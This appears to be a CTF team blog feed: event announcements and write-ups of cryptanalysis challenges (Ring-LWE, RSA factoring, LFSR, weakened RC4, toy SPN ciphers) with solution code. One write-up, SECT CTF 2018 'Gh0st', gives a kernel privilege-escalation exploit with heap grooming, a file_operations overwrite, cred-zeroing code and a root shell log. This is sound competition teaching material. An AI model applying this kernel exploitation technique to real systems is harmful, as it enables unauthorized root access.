More Smoked Leet Chicken

CyBRICS 2020 Lite

vos — Mon, 20 Jul 2020 18:10:18 +0000

If you haven’t yet registered for our 2020 edition of CyBRICS CTF, you should.

Like last year, it’s made by the SPbCTF meetups crew (guys from MSLC / LC↯BC, SiBears, PeterPEN, Yozik), and we invite all teams to play.

Unlike last year, this one is Lite: a single online Jeopardy round, everyone is eligible, and you get prizes without playing Attack-Defense! (which is rare nowadays)

The same great set of 28 challenges ranging from easy pen-and-paper to interesting for 24 hours of gameplay. Noobies will have a taste of what CTFs are, skilled will have fun and check if they can pwn everything the fastest, competing for the prizes.

Registration open: now
Game is live: July 25th, 2020 10:00 UTC
Game ends: July 26th, 2020 10:00 UTC (24 hours)

Sign up: https://cybrics.net/ (CTFtime page)

Prizes:
1st place: 3 000 USD
2nd place: 2 000 USD
3rd place: 1 000 USD

Additionally, we have a special prize from XCTF League: 1st place gets a spot in the traditional XCTF Finals 2020 in China, where teams get qualified by winning other contests.

On top of that, Top-3 teams each get 5 tickets to Positive Hack Days and to OFFZONE international infosec conventions in Moscow (what are those)

So in just a few words: Online-only, open to all. 28 good old Jeopardy tasks. July 25th.

PwnThyBytes CTF 2019 – Wrong Ring (Crypto)

hellman — Mon, 30 Sep 2019 05:53:54 +0000

Is post quantum cryptography too complex for you?

wrong_ring.sage

Summary: Ring-LWE with small error, hidden under a number field

Let us look at the main part:

prime = 1487
degree = 256
q = x^256 + prime - 1
N = PolynomialRing(RationalField(100)).quo(q)
roots = q.roots(CC) # in particular order
for i in range(nr_samples):
  a = random_vector_mod(prime, degree)
  a_coeff = vec2poly(a)
  
  a_canonical = coeff_to_canonical(a_coeff, roots)
  out.write('a_'+str(i)+' is '+str(a_canonical)+'\n')

  err_coeff = generate_error(sigma, prime, degree)
  b_coeff_interm = N(a_coeff * sec_coeff + err_coeff)
  b_coeff = 0
  for j in range(degree):
    b_coeff = b_coeff + \
      x^j*reduction_mod(b_coeff_interm.list()[j],prime)
  
  b_canonical = coeff_to_canonical(b_coeff, roots)
  out.write('b_'+str(i)+' is '+str(b_canonical)+'\n')

Let $p = 1487$. Note that $a(x)$ and $s(x)$ are polynomials over $GF(p)$. However, the error polynomial $e(x)$ (given by err_coeff) has real coefficients. Moreover, the function coeff_to_canonical evaluates its polynomial argument at the complex roots of the ring-defining polynomial $q(x)$. We are given 8 samples of $a(x)$ and $b(x)$ in this form.

The high-level setting is basically a Ring-LWE scheme. The ring is $GF(p)[x]/(x^{256}-1)$, that is, polynomials are reduced by the rule $x^{256}=1$ and coefficients are reduced modulo $p$. This is very intuitive: multiplying a polynomial by $x$ simply rotates its vector of coefficients to the left.
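As a quick sanity check of the rotation claim, here is a minimal Python sketch (not part of the challenge code) of multiplication in $GF(p)[x]/(x^n-1)$. The helper names `mul_cyclic` and `rotate` and the toy size n = 8 are assumptions made for illustration. Coefficients are stored from lowest to highest degree, so whether the rotation looks "left" or "right" depends only on how the vector is written down.

```python
def mul_cyclic(a, b, p):
    """Multiply two coefficient vectors modulo x^n - 1 and modulo p."""
    n = len(a)
    out = [0] * n
    for i, ai in enumerate(a):
        for j, bj in enumerate(b):
            k = (i + j) % n          # x^n = 1, so exponents wrap around
            out[k] = (out[k] + ai * bj) % p
    return out


def rotate(a):
    """Cyclic shift: the coefficient of x^i moves to x^(i+1)."""
    return a[-1:] + a[:-1]


p, n = 1487, 8                       # toy degree, the challenge uses 256
a = [3, 1, 4, 1, 5, 9, 2, 6]         # arbitrary example polynomial
x = [0, 1] + [0] * (n - 2)           # the polynomial "x"
print(mul_cyclic(a, x, p) == rotate(a))
```

The same wrap-around indexing is what fills the diagonals of the multiplication matrix in the solution code.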

$s(x)$ is a secret polynomial in the ring: after recovering it we can decrypt the jpeg image and read the flag. We get 8 samples of the form $a_i,b_i$, such that $b_i(x) = a_i(x)s(x)+e_i(x)$, where $a_i(x)$ is a random polynomial over $GF(p)$ and $e_i(x)$ is a vector with ‘small’ but also fractional coefficients.

Recall that we don’t get exactly the coefficients of $a_i, b_i$. Instead, we get evaluations of these polynomials at the complex roots of the polynomial $q(x)=x^{256}+p-1$, which are represented as high-precision floating-point numbers. However, we can recover the polynomials rather precisely using interpolation. Note that the matrix Sigma defined in the code corresponds exactly to evaluation of a polynomial at the aforementioned roots. Its inverse matrix Sigma_Inv therefore corresponds exactly to interpolation with respect to those roots, and we can recover the polynomials $a_i(x),b_i(x)$ by multiplying the given vectors by Sigma_Inv. The precision is enough to recover $a_i$ exactly, since it has integer coefficients (i.e., we simply round the coefficients to the nearest integers). However, due to the added error, $b_i(x)$ is not integral and we have to look at the magnitude of the error polynomial $e(x)$, which is generated in a very special way.

def generate_error(sigma, prime, degree):
    D = RealDistribution('gaussian',sigma)
    error = []
    for i in range(degree):
        error.append(D.get_random_element())
    # convert to a column vector once all samples are collected
    error = vector(error).column()
    # U = 1//sqrt(2) * matrix([[1, i], [1, -i]])
    error_canonical = U * error
    error_coeff = []
    error_coeff_interm = Sigma_Inv * error_canonical
    for i in range(degree):
        error_coeff += [error_coeff_interm[i][0].real()]
    error_coeff = vec2poly(error_coeff)
    return error_coeff

First, a vector of 256 values is sampled from a Gaussian distribution with sigma = 1000 (the average absolute value is about 800, which is rather high). Let $r_0$ and $r_1$ be its two halves. Then the vector is multiplied by the matrix $U$, which results in $r' = (r_0 + ir_1 || r_0 - ir_1)$ (up to the constant factor in $U$), i.e. the second half is the complex conjugate of the first half. Then, this vector is treated as the vector of values of a polynomial $e(x)$ taken at the complex roots of the polynomial $x^{256}+p-1$, which are ordered exactly such that the second half of the roots is the complex conjugate of the first half of the roots (note that all roots come in conjugate pairs). Finally, the vector $r'$ is interpolated to obtain the polynomial $e(x)$. This is done by multiplying $r'$ by the Sigma_Inv matrix. The polynomial $e(x)$ is then used in the Ring-LWE scheme described above.

I haven’t yet figured out a precise explanation, but it turns out that this way of generating $e(x)$ produces polynomials with much smaller coefficients than expected (see UPD1). In particular, the least significant coefficients have an average absolute value of about 30, and the most significant coefficients are actually much smaller than 1! As a result, we can recover precisely several top coefficients of $a_i(x)s(x) = b_i(x)-e_i(x)$ by rounding $b_i(x)$, similarly to $a_i(x)$! Each such coefficient gives us a linear relation on $s(x)$ with coefficients defined by $a_i(x)$. Since we have 8 samples and $s(x)$ has 256 coefficients, we need to obtain at least 32 most significant coefficients of each $b_i(x)$. Experimentally we can verify that we can safely obtain these coefficients by rounding. By taking 33 equations per sample, we can ensure that the system is overdetermined and a wrong solution is not likely to pass.

Here is the pretty simple solution code (put the values from challenge.txt in the arrays $a$ and $b$):

T = 33
t = []
eqs = []
for i in xrange(8):
    # interpolate a_i and b_i and round
    avec = [round(v.real()) for v in Sigma_Inv * a[i]]
    bvec = [round(v.real()) for v in Sigma_Inv * b[i]]

    # generate matrix of multiplication by a_i(x)
    # recall that mult. by x
    # is simply rotation in our ring
    # thus we simply fill diagonals
    m = matrix(GF(prime), 256, 256)
    for ia, va in enumerate(avec):
        for j in xrange(256):
            m[(ia+j) % 256,j] = va

    # take the most significant T coefficients
    # as linear equations
    eqs.extend(list(m[-T:]))
    t.extend(list(bvec[-T:]))

m = matrix(GF(1487), eqs)
t = vector(GF(1487), t)

sol = m.solve_right(t)
print("sol", sol)

UPD1: The challenge author pointed me to the relevant paper with explanations about the norms and the attack: Provably Weak Instances of Ring-LWE revisited (Wouter Castryck et al.)

1st Crypto CTF 2019 – Least Solved Challenges

hellman — Sun, 11 Aug 2019 17:50:24 +0000

Brief solution ideas to the least solved Crypto CTF challenges.

Midnight Moon

We can see that the primes are generated as follows. Let $m$ be the right half of the flag (as an integer) and $l$ be its byte length. We repeat the transformation $m \mapsto ((m+1)\cdot l)\oplus l$ until $m$ is prime. This is the first prime $p$. Then we set $m = 2m+1$ and repeat the first transformation until we get another prime. As a result, the second prime $q$ is approximately equal to $2 l^e p$, where $e$ is the number of iterations in the last process. We can guess $e$ and $l$ (note that $e$ is upper bounded by $\log_l n$) and then apply the Fermat factorization method to the number $2 l^e n = 2 l^e p q$. It should work since $2 l^e p \approx q$. Since $e$ can vary a lot, we can only hope that the approximation is good enough. However, there is a little subtlety with the Fermat method. It works only if both close factors have the same parity, which is not the case: $2l^e p$ is even and $q$ is odd. This can be easily overcome by multiplying the number by $4$, which corresponds to multiplying both close factors by 2.
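The parity trick can be illustrated with a small Python sketch. Everything concrete here is an assumption for demonstration: the helper `fermat`, the toy values of `l`, `e`, `p`, and the choice `q = k*p + 101` (which is not required to be prime for the factoring step to work). The real challenge uses much larger numbers and $l=27$, $e=442$.

```python
from math import gcd, isqrt


def fermat(n, max_steps=10**6):
    """Fermat's method: find a, b with a^2 - b^2 = n, return (a - b, a + b)."""
    a = isqrt(n)
    if a * a < n:
        a += 1
    for _ in range(max_steps):
        b2 = a * a - n
        b = isqrt(b2)
        if b * b == b2:
            return a - b, a + b
        a += 1
    return None


# Toy stand-ins for the challenge values (assumptions).
l, e = 27, 3
k = 2 * l**e                 # the guessed multiplier 2 * l^e
p = 1000003
q = k * p + 101              # q is close to k * p, and odd
n = p * q

# Multiply by 4 * k: the close factors 2*k*p and 2*q are now both even.
x, y = fermat(4 * k * n)
p_found = gcd(x, n)
q_found = n // p_found
print(p_found, q_found)
```

Without the extra factor 4 the two close factors $kp$ and $q$ would have different parity, so no integer pair $a, b$ with $a-b = kp$ and $a+b = q$ would exist.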

In the challenge the modulus can be factored with $l=27$ and $e=442$. The next step is to guess the number of applications of the transformation $m \mapsto ((m+1)\cdot l)\oplus l$ when going from initial $m$ to the first prime $p$. After trivial inversion of the transformation, we obtain the right half of the flag: “4D3_1n__m1dNi9hT_witH_L0v3!}”. We could study the encryption function to decrypt the first half, but we can already guess the whole flag: “CCTF{M4D3_1n__m1dNi9hT_witH_L0v3!}”, which is correct.

Starving Parrot

The primes are generated by taking two random values and applying some fixed unknown polynomial to them. Once the two values are primes, the process is finished. Since we have access to the polynomial, we can easily recover it, for example by putting 10000000000000000000000000000000 as input we can clearly see the output 100…003700..002019. The polynomial is trivially deduced: $x^{13} + 37x+2019$. It follows that
$$n = (r^{13} + 37r+2019) \cdot (s^{13} + 37s+2019)$$
for some $r,s$ of size roughly 55 bits. Observe that $\sqrt[13]{n}$ provides a good approximation of $rs$. In fact, in the given setting $\lfloor \sqrt[13]{n} \rfloor = rs$. This number has 108 bits and can be easily factored:
$$\begin{multline*}251970989651144357978582196759904 = 2^5 \cdot 11 \cdot 13^2 \cdot 61 \cdot 239 \cdot 491\cdot\\ \cdot 3433 \cdot 137383 \cdot 1254599604823.\end{multline*}$$
This number has 2304 divisors in total. Each divisor gives a candidate for $r$ and its complement is a candidate for $s$. By applying the polynomial to them, we can obtain potential prime factors and check if they result in the same modulus. In the challenge we obtain
$$\begin{align*}r &= 30132816491977336,\\ s &= 15416171199104228.\end{align*}$$
Given the factorization, we can easily decrypt the message (don’t forget to invert the operations applied to the message before squaring):

“CCTF{it5____Williams____ImprOv3d_M2_Crypt0yst3m!!!}”.
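The divisor search described above can be sketched in Python as follows. The values of `r` and `s` below are small hypothetical stand-ins, not the challenge values, and trial division is used only because the toy product is small; for the 108-bit number from the challenge a real factoring tool would be needed. The helper names `iroot`, `divisors` and `recover` are likewise made up for this sketch.

```python
def poly(v):
    """The prime-generating polynomial recovered from the oracle."""
    return v**13 + 37 * v + 2019


def iroot(n, k):
    """Largest integer t with t**k <= n (binary search)."""
    lo, hi = 0, 1 << (n.bit_length() // k + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid**k <= n:
            lo = mid
        else:
            hi = mid - 1
    return lo


def divisors(m):
    """All divisors of m by trial division (fine for toy sizes only)."""
    small, large = [], []
    d = 1
    while d * d <= m:
        if m % d == 0:
            small.append(d)
            if d != m // d:
                large.append(m // d)
        d += 1
    return small + large[::-1]


def recover(n):
    """Try every divisor d of floor(n^(1/13)) as r, with s = rs / d."""
    rs = iroot(n, 13)
    for d in divisors(rs):
        if poly(d) * poly(rs // d) == n:
            return d, rs // d
    return None


r, s = 100003, 200003        # hypothetical small inputs
n = poly(r) * poly(s)
print(recover(n))
```

The check `poly(d) * poly(rs // d) == n` is the "do they result in the same modulus" test from the text; primality of the two factors is not needed for the search itself.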

Oliver Twist

We can recognize the (twisted) Edwards curve addition formulas:
$$\begin{align*}
x_3 &\equiv (x_1 y_2 + y_1 x_2) / (1 + d x_1 x_2 y_1 y_2)\pmod{p},\\
y_3 &\equiv (y_1 y_2 - a x_1 x_2) / (1 - d x_1 x_2 y_1 y_2) \pmod{p}.
\end{align*}$$
In our case $a=3$ and $d=2$. You can learn a bit about twisted Edwards curves for example from slides by Christiane Peters. We are given $y$-coordinate of a point that was generated from the flag in a particular way. In order to find the $x$ coordinate, we have to plug the $y$ coordinate into the curve equation and solve for $x$:
$$3x^2 + y^2 - 2x^2y^2-1\equiv 0 \pmod{p}.$$
This is a quadratic equation in $x$ and we can easily find both roots. One of them is significantly smaller than $p$, so we can assume that this is the one we are looking for. This point $(x,y)$ is obtained by doubling the point $(m', y)$ $(m' \bmod 3)$ times, where $m'$ is generated from the flag. Since we found a small $x$, we can guess that $m' \bmod 3 = 0$, that no doublings occurred, and that $x = m'$. Now, $m'$ is generated from the flag $m$ by adding $\sum_{i=1}^t 2^i + 3i$ to it for some small integer $t \ge 313$. We guess $t$ and subtract the added terms. We obtain for $t=313$ the flag:

“CCTF{N3w_But_3a5Y_Twisted_Edwards_curv3_Crypt0sys7em}”.
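The step of solving the curve equation for $x$ given $y$ can be sketched in Python. The modulus `P = 10007` is a toy prime chosen here only because $P \equiv 3 \pmod 4$ makes square roots a single exponentiation; the challenge modulus is different and may need a general square-root algorithm. The function names are assumptions for this sketch.

```python
P = 10007        # toy prime with P % 4 == 3 (assumption, not the challenge modulus)
A, D = 3, 2      # curve parameters a and d from the writeup


def sqrt_mod(v, p=P):
    """Both square roots of v modulo p (p % 4 == 3), or [] for a non-residue."""
    v %= p
    r = pow(v, (p + 1) // 4, p)
    if r * r % p != v:
        return []
    return sorted({r, (p - r) % p})


def x_candidates(y, p=P):
    """Solve a*x^2 + y^2 - d*x^2*y^2 - 1 = 0 for x: x^2 = (1 - y^2) / (a - d*y^2)."""
    num = (1 - y * y) % p
    den = (A - D * y * y) % p
    if den == 0:
        return []
    return sqrt_mod(num * pow(den, -1, p), p)


def on_curve(x, y, p=P):
    return (A * x * x + y * y - D * x * x * y * y - 1) % p == 0


print(x_candidates(1))   # y = 1 lies on the curve together with x = 0
```

In the challenge one would then pick the root that is much smaller than $p$, as described above.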

CyBRICS CTF 2019 — we’re making a full-fledged one!

vos — Sat, 13 Jul 2019 18:26:55 +0000

We, in SPbCTF meetups crew (guys from LC↯BC, SiBears, PeterPEN, Yozik), were invited to make a CTF together with some BRICS countries universities.

So we made one — and invite everyone to compete, have fun and win some prizes in CyBRICS CTF 2019. This one continues the tradition of hack you events, but this time it won’t be individual. Teams are welcome.

28 challenges ranging from easy pen-and-paper to interesting. Noobies will have a taste of what CTFs are, skilled will have fun and check if they can pwn everything the fastest, academic teams will compete for 10 000 USD first place prize.

Registration open: now
Game is live: July 20th, 2019 10:00 UTC
Game ends: July 21st, 2019 10:00 UTC (24 hours)

Sign up: https://cybrics.net/ (CTFtime page)

Quals Prizes:
Top-5 academic teams from each BRICS country are invited to the on-site Attack-Defense Finals in St. Petersburg
Top-1 team in Quals gets a spot in XCTF Finals 2019 (September, China).

Finals Prizes:
1st place: 10 000 USD
2nd place: 5 000 USD
3rd place: 3 000 USD

So in just a few words: New CTF by us. 28 good old Jeopardy tasks. July 20th.

SECT CTF 2018 :: Gh0st

blackzert — Fri, 14 Sep 2018 16:39:50 +0000

Original Description:

Gh0st – Pwn (468)

Yikes, one of our finest cyberwarrior plugged into the wrong system. His mind is stuck in the kernel. Bring a plunger and your finest kernel exploit
Service: nc 142.93.38.98 6666 | nc pwn.sect.ctf.rocks 6666
Download: gh0st.tar.gz
Author: likvidera

Summary: linux kernel exploitation using an out-of-bounds kernel memory write.

Analysis

So here we have a kernel image with an initrd image which contains the gh0st.ko kernel module. After a little reversing we see that this module creates the ‘/dev/gh0st’ file and handles file operations on it.

The most interesting part is the dev_ioctl function, which handles ioctl calls to that device. It introduces two commands:

#define WRITE_BF 0x1337B4B3
#define EXECUTE_BF 0xAC1DC0DE

The first one is used to write a program into a static buffer variable called ‘bytecode’, which keeps it for a second syscall. At the same time it verifies that the program consists only of allowed operations:

do {
    v8 = bytecode.code[index];
    if ( !v8 )
        break;
    v9 = v8 - 0x2B;
    if ( v9 > 50u ) {
        is_valid = 0;
    } else if ( !((0x50000000A000FuLL >> v9) & 1) ) {
        is_valid = 0;
    }
    ++index;
} while ( index != 1048 );
error_msg = "\x016Invalid bf";
if ( !is_valid )
    goto fail;

which allows the following symbols in the program: #define alpha "+,-.<>[]"
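To double-check that reading of the bitmask, the constant from the decompiled loop can be decoded with a few lines of Python. This is only a verification aid written for this writeup; `allowed_chars` is a made-up helper name.

```python
MASK = 0x50000000A000F   # constant from the decompiled validation loop
BASE = 0x2B              # value subtracted from each program byte ('+')


def allowed_chars(mask=MASK, base=BASE, max_offset=50):
    """Characters c for which bit (c - base) of the mask is set."""
    return "".join(
        chr(base + i) for i in range(max_offset + 1) if (mask >> i) & 1
    )


print(allowed_chars())
```

Bits 0 to 3 give the four characters starting at '+', bits 17 and 19 give the angle brackets, and bits 48 and 50 give the square brackets.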

Here is the meaning of them:
'+', '>' : inc stack ptr
'-', '<' : dec stack ptr
',' : get gap_in[gap_pos_in++] and put it to stack
'.' : get symbol from stack, put it to gap_out[gap_pos_out++]

and it is important to look at the structure of program context:

struct bf_format {
    char header[4];
    int stack_size;
    char gap_in[256];
    char gap_out[256];
    char code[1048];
};

The stack is allocated with kmalloc(size, GFP_KERNEL) and freed once the program has been executed. We can move the stack pointer with + and - and write outside the bounds of the allocated buffer.

Allocator

Now is a good time to see which allocator is used by this kernel. Using gdb and gdb.cmd from the original task archive we can load symbols. If we break at kmalloc and trace a bit, we will see that the kernel uses the SLOB allocator. This allocator maintains three different lists: small chunks (less than 256 bytes), medium (less than 1024) and large (less than 4096). Any bigger allocation is served by the page allocator. To do something useful with our primitive we should place some interesting objects near our buffer and overwrite them. The easiest way is to try to overwrite a ‘struct file’, since it has the ‘file_operations’ pointer to the functions that handle file operations.

After hours of experiments ;) following code was stable:

for( j =0; j < 200; ++j)
    open("./exploit", O_RDONLY);
corrupt();

Here the function 'corrupt' overwrites the object that follows the one allocated as our stack. The chosen stack size is 32 bytes.

Now, we know that the kernel has KASLR and SMEP/SMAP disabled. So we may overwrite the file_operations pointer with the address of our own user-mode array, which contains a pointer to a function that changes creds:

unsigned long mign_buffer[1024/8] = {0};
mign_buffer[2] = &hack;
*(unsigned long*)(&bf->gap_in) = (unsigned long)&mign_buffer;
inc_stack_ptr();
inc_stack_ptr();
inc_stack_ptr();
inc_stack_ptr();
inc_stack_ptr();
inc_stack_ptr();
inc_stack_ptr();
inc_stack_ptr();
inc_stack_ptr();
inc_stack_ptr();
write_stack_ptr();

mign_buffer[2] corresponds to the offset of the read operation inside the file_operations structure. inc_stack_ptr is 8× '+' and write_stack_ptr is 8× ',+'

The hack function is supposed to set uid = 0 in current_task->cred and restore the file operations back to romfs_fileoperations. We get this address from the symbols.

void hack(char *file) {
    char * current_task = (char*)*(unsigned long *)0xffffffff81839040;
    char * cred = (char*)*(unsigned long*)(current_task + 0x3c0); // offset of cred
    for (unsigned int k = 4; k < 0x24; ++k)
        cred[k] = 0; // zero all *id in creds
    //print("hack happend!\n");
    *(unsigned long *)(file + 0x28) = 0xffffffff81616e40; // fix fops
    // 0xffffffff81616e40
    j = 10000;
    return;
}

Since we call read in a loop, we should probably stop it by setting j = 10000;

Finally, we call execve and we are done.

[+] sending bytes: 3048
[+] 3048 of 3048 transferred
[*] Switching to interactive mode
./exploit
1337
we r00t
/bin/sh: can't access tty; job control turned off
/home/ctf # id
id
uid=0(root) gid=0(root) groups=1337(ctf)
/home/ctf # cat flag
cat flag
SECT{k3rn3l_ex0rc1sm}

/home/ctf #

Exploit is written without libc-stuff to make it smaller and make uploading easier.

All the sources are here: expl

Midnight CTF 2018 Finals – Snurre128

hellman — Wed, 27 Jun 2018 16:30:47 +0000

In this challenge we have a stream cipher based on LFSR and nonlinear filtering function. It has 128-bit LFSR secret state and we are also given 1600 keystream bits. Our goal is simply to recover the key which is the initial state. Here is the nonlinear filtering function:

f(v) =
v[0] ^ v[1] ^ v[2] ^ v[31] ^ 
v[1]&v[2]&v[3]&v[64]&v[123] ^ 
v[25]&v[31]&v[32]&v[126]

We can see that the two nonlinear terms are products of 5 and 4 variables. With high probability these terms are equal to zero and the filtering function becomes linear. More precisely, define

L(v) = v[0] ^ v[1] ^ v[2] ^ v[31]

Then the probability $p$ that $f(v) = L(v)$ equals $15/16 \times 31/32 + 1/16 \times 1/32 = 233/256$. Moreover, for 128 keystream bits the approximation can be expected to hold with probability $p^{128} \approx 2^{-17.384}$ or roughly $1/171000$. That is, if we sample 128 keystream bits roughly 171000 times we can expect that once they all are filtered using the linear function $L$. Then we can solve the (noiseless) linear system and recover the key. We can sample bits from the 1600-bit keystream since we expect that roughly $233/256\times 1600$ of them are filtered using the linear function and we will succeed once we choose 128 bits out of them. We just need to know the linear function that maps the original key to each of the output keystream bits (i.e. repeated LFSR step and linear filtering). This can be done simply by running Snurre with the linear filtering function on keys with a single bit set (i.e. basis vectors) and putting the resulting streams into the columns of a matrix.
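The numbers above are easy to reproduce. The following Python sketch recomputes them under the same assumption the estimate uses, namely that the state bits feeding the two nonlinear terms are uniform and independent; the variable names are ours.

```python
from fractions import Fraction
from math import log2

# Probability that each AND-term is zero, for uniform independent bits.
p_term5_zero = 1 - Fraction(1, 2**5)   # product of 5 variables
p_term4_zero = 1 - Fraction(1, 2**4)   # product of 4 variables

# f(v) == L(v) when the XOR of the two terms is 0: both zero or both one.
p = p_term5_zero * p_term4_zero + (1 - p_term5_zero) * (1 - p_term4_zero)

log2_all_linear = 128 * log2(p)        # log2 of p^128
expected_tries = 2 ** (-log2_all_linear)
expected_linear_bits = float(p * 1600)

print(p, log2_all_linear, round(expected_tries), expected_linear_bits)
```

So about 1456 of the 1600 keystream bits are expected to follow the linear function, which is why random 128-bit subsets have a realistic chance of being noise-free.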

The solution may take some time, e.g. around 1 hour on a common laptop. But it can be easily parallelized simply by running multiple instances.

Solution code in Sage

The problem of solving noisy linear equations is called Learning Parity with Noise (LPN). There are various methods for approaching it. A good recent paper on this topic is “LPN Decoded” by Esser et al. For example, the method described above is called Pooled Gauss in the paper.

0CTF 2018 Quals – zer0C5 (Crypto 785)

hellman — Mon, 02 Apr 2018 14:28:42 +0000

0ops Cipher 4, hope you enjoy it:)
zer0C4.zip
nc 202.120.7.220 1234

Summary: related-key attack on weakened variant of RC4

In this challenge we have a weakened version of RC4. It operates on a permutation of the values $0\ldots 31$. Moreover, $i$ is incremented at the beginning of the loop instead of the end.

We are given access to a related-key oracle. We can send any key delta and the server will return us the generated sequence using the key xored with our delta.
There is a well known paper “Weaknesses in the Key Scheduling Algorithm of RC4.” by Fluhrer, Mantin, Shamir. In Section 8 they describe a Related Key attack. And it actually works better if the key schedule is modified exactly as in the challenge.

The main idea is that we can recover the 16-byte key in layers of 16 bits, from the LSBs of each key byte to the MSBs. If the LSBits of the key bytes form a special pattern, then the LSBits of the output sequence correlate with a special sequence.

It is slightly difficult because we have only 1500 queries of 512 deltas, that is $2^{19.5}$ deltas total. We can recover 4 LSBits of each key byte and then bruteforce the 16 MSBits locally.

With a good probability we get the key.

Full solution: https://gist.github.com/hellman/3faeb41275fb013407b503d69f332207

The flag: flag{Haha~~Do_y0u_3nj0y_ouR_stre4m_c1pher?}

0CTF 2018 Quals – zer0SPN (Crypto 550)

hellman — Mon, 02 Apr 2018 14:04:24 +0000

0ops SPN, hope you enjoy it:)
zer0SPN.zip

Summary: linear cryptanalysis on toy block cipher

In the challenge we have a “toy block cipher”. It is an SPN cipher with:

4 rounds
eight 8-bit S-Boxes (64-bit block)
bit permutations as linear layer

We are given $2^{16}$ random plaintext/ciphertext pairs.

In contrast to the zer0TC challenge, the bit permutation is strong and provides full diffusion. The S-Box is weak both differentially and linearly. Since we have known plaintexts, the way to go is linear cryptanalysis.

We shall attack the first round in order to get the master key and avoid the need for key-schedule reversal. First, we need to find good 3-round linear trails. This can be done using various algorithms/tools.

For example:
Masks after first round: [ 64, 0, 0, 0, 0, 0, 0, 0],
Masks on ciphertexts: [242, 0, 0, 0, 0, 0, 242, 0],
Bias: $2^{-5.675513}$

We need to have bias $>2^{-8}$ because we have $2^{16}$ data. It actually is easier if the bias is around $2^{-6}$, then the right key byte will be the top candidate in our list with high probability.

The attack procedure:
1. Guess the first key byte $k$ of the master key
2. Partially encrypt the first byte of all plaintexts: $x' = S(x \oplus k)$.
3. Compute the linear product: $c = scalar(x', mask)$
4. Compute the bias of all $c$ (i.e. how unbalanced the distribution of 0/1 is).
The right key byte should be among the top candidates when sorted by the bias.
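The ranking procedure can be sketched in Python on a toy setup. This is not the solution code from the gist: the S-box is a random permutation, and the "observed bit" is simulated directly as the masked S-box output with 25% noise, whereas in the real attack that bit would come from applying the ciphertext masks of the 3-round trail to each ciphertext. All names (`rank_key_bytes`, `samples`, `secret`) are assumptions for this sketch.

```python
import random


def parity(v):
    """Parity of the set bits of v (the scalar product with an all-ones mask)."""
    return bin(v).count("1") & 1


def rank_key_bytes(samples, sbox, mask):
    """Rank key-byte guesses by bias.

    samples: list of (plaintext_byte, bit), where bit is the parity the
    linear trail predicts from the ciphertext side.
    """
    ranking = []
    for k in range(256):
        # parity of mask . S(x ^ k) for every possible plaintext byte x
        pbit = [parity(sbox[x ^ k] & mask) for x in range(256)]
        agree = sum(pbit[x] == bit for x, bit in samples)
        bias = abs(agree / len(samples) - 0.5)
        ranking.append((bias, k))
    ranking.sort(reverse=True)
    return [k for _, k in ranking]


# Toy data (assumptions): random S-box, one secret key byte, noisy trail.
rng = random.Random(2018)
sbox = list(range(256))
rng.shuffle(sbox)
mask, secret = 64, 0xA7

samples = []
for _ in range(4096):
    x = rng.randrange(256)
    bit = parity(sbox[x ^ secret] & mask)
    if rng.random() < 0.25:          # the trail holds only with some bias
        bit ^= 1
    samples.append((x, bit))

print(rank_key_bytes(samples, sbox, mask)[:3])
```

Using the absolute deviation from 1/2 means the sign of the trail does not need to be known in advance.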

After we recover a couple of key bytes, we can use linear trails which have more active S-Boxes in the first round. The constraint is only that we have to guess only one extra key byte each time.

Full solution: https://gist.github.com/hellman/4950bff09b615e613d46be9eed4bc414

Finally, we get the flag: flag{48667ec1a5fb3383}

0CTF 2018 Quals – zer0TC (Crypto 916)

hellman — Mon, 02 Apr 2018 13:34:43 +0000

0ops Toy Cipher, hope you enjoy it:)
zer0TC.zip

Summary: meet-in-the-middle and key-schedule constraints

In the challenge we have a “toy block cipher”. It is an SPN cipher with:

5 rounds
8 8-bit S-Boxes (64-bit block)
bit permutations as linear layer

The bit permutation is weak: it maps 7 output bits of one S-box to 7 input bits of some S-Box in the next round. Still, 1 extra bit comes to each S-Box input. We can think about it as random/noise. The cipher then splits into 8 chains of 6 S-Boxes with key additions and bit permutations between the S-Boxes (and extra “noisy” bits coming in).

We can attack each chain separately first, using meet-in-the-middle:
The first half requires us to guess 3 keys and 1 extra incoming bit per each plaintext.
The second half requires us to guess 3 keys and 2 extra incoming bits per each plaintext.

Using 3 pairs of pt/ct, we get:
$(2^{24} 2^3)(2^{24} 2^6)$ total guesses / $2^{24}$ filtering in the middle.
As a result, we get $2^{33}$ valid guesses using $2^{30}$ time (each valid guess corresponds to key + extra bits, so we will actually have fewer unique keys).

We then can use other 5 pairs of pt/ct to reduce the number of key candidates to
$(2^{48} * 2^{32})$ total guesses / $2^{64}$ filtering = $2^{16}$ valid guesses.
Again, the number of unique keys will be smaller (in fact it is around $3500 < 2^{12}$).

As a result, we still have lots of key candidates $(2^{12})^8 = 2^{96}$ total. Even more than $2^{64}$ actual keys. Now we have to use the key schedule to match the candidates correctly and efficiently.

The key schedule is AES-like. As it is difficult to find all useful places in key schedule by hand, we generate all byte equations from the key schedule and then choose and use them automatically.

Full solution: https://gist.github.com/hellman/10206114e790fd3e8d92b41209ac8381

The flag: flag{7e035ed7c2bc78c3}

hack you ’17 :: easy CTF on Oct 8—14

vos — Thu, 05 Oct 2017 20:09:59 +0000

As a tradition, every fall we host a fun lightweight Jeopardy CTF for our freshmen to attract them into all the CTFey goodness. This one will be our fifth year (holy shit!)

We invite everyone to check out hack you ’17 this year. Just as always, two separate scoreboards: one for SPbCTF meetups, one for everyone in the world. And yeah, we have some prizes this year!

28 challenges ranging from easy pen-and-paper to interesting. Noobies will have a taste of what CTFs are, skilled will have fun and check if they can pwn everything the fastest.

Registration open: now (sign up individually — no teams)
Game is live: October 8th, 2017 18:00 UTC
Game ends: October 14th, 2017 18:00 UTC

Sign up: https://hackyou.ctf.su/

Prizes:
Top-3 in the Overall board get a free ZeroNights 2017 entry each.
Top-50 in the Overall scoreboard qualify to the Final event in Saint Petersburg on October 29th.

So in just a few words: Fifth hack you. 28 good old speedhack tasks. October 8th.

TWCTF 2017 – Solutions for BabyPinhole, Liar’s Trap, Palindrome Pairs Challenge

hellman — Mon, 04 Sep 2017 10:03:55 +0000

Scripts with short explanations:

BabyPinhole (crypto 163)
Liar’s Trap (crypto/ppc 281)
Palindrome Pairs – Challenge Phase (ppc 63+337)

Polictf 2017 – Lucky Consecutive Guessing (Crypto)

hellman — Sun, 09 Jul 2017 09:08:37 +0000

We implemented a random number generator. We’ve heard that rand()’s 32 bit seeds can be easily cracked, so we stayed on the safe side.

nc lucky.chall.polictf.it 31337

chall.py

Summary: breaking truncated-to-MSB LCG with top-down bit-by-bit search.

